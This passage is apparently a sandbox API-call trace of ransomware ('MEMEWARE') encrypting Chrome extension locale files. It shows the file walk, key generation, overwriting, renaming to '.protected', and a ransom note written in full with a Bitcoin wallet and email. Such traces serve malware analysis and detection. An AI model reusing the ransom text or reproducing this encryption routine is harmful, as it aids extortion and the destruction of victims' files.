Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\messages.json.protected")) returned 1 [0080.927] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.927] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\RESTORE_FILES.txt") returned 163 [0080.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.928] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.928] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.929] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.929] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.929] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.929] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.929] CloseHandle (hObject=0x164) returned 1 [0080.929] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Windows") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Program Files") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="Program Files (x86)") returned -1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="$Recycle.bin") returned 1 [0080.929] lstrcmpiW (lpString1="ca", lpString2="System Volume Information") returned -1 [0080.929] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca") returned 145 [0080.929] lstrcmpW (lpString1="ca", lpString2=".") returned 1 [0080.929] lstrcmpW (lpString1="ca", lpString2="..") returned 1 [0080.929] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*") returned 147 [0080.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.930] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\.") returned 147 [0080.930] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.930] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\..") returned 148 [0080.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.930] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.930] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.930] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.930] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.930] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.930] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.930] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.931] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json") returned 159 [0080.931] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.931] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2c1, lpOverlapped=0x0) returned 1 [0080.938] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd3f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.938] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2c1, lpOverlapped=0x0) returned 1 [0080.938] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.939] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.939] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.939] CloseHandle (hObject=0x168) returned 1 [0080.939] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected") returned 169 [0080.939] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\messages.json.protected")) returned 1 [0080.940] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.940] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.940] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\RESTORE_FILES.txt") returned 163 [0080.940] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\ca\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.940] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.940] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.941] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.941] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.941] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.941] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.941] CloseHandle (hObject=0x164) returned 1 [0080.942] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1="cs", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs") returned 145 [0080.942] lstrcmpW (lpString1="cs", lpString2=".") returned 1 [0080.942] lstrcmpW (lpString1="cs", lpString2="..") returned 1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*") returned 147 [0080.942] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.942] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\.") returned 147 [0080.942] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.942] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.942] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.942] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.942] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\..") returned 148 [0080.943] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.943] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.943] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.943] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.943] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.943] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.943] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.943] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.943] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.943] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.944] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json") returned 159 [0080.944] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.944] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x297, lpOverlapped=0x0) returned 1 [0080.949] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd69, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x297, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x297, lpOverlapped=0x0) returned 1 [0080.950] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.950] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.950] CloseHandle (hObject=0x168) returned 1 [0080.950] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json.protected") returned 169 [0080.950] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\cs\\messages.json"), 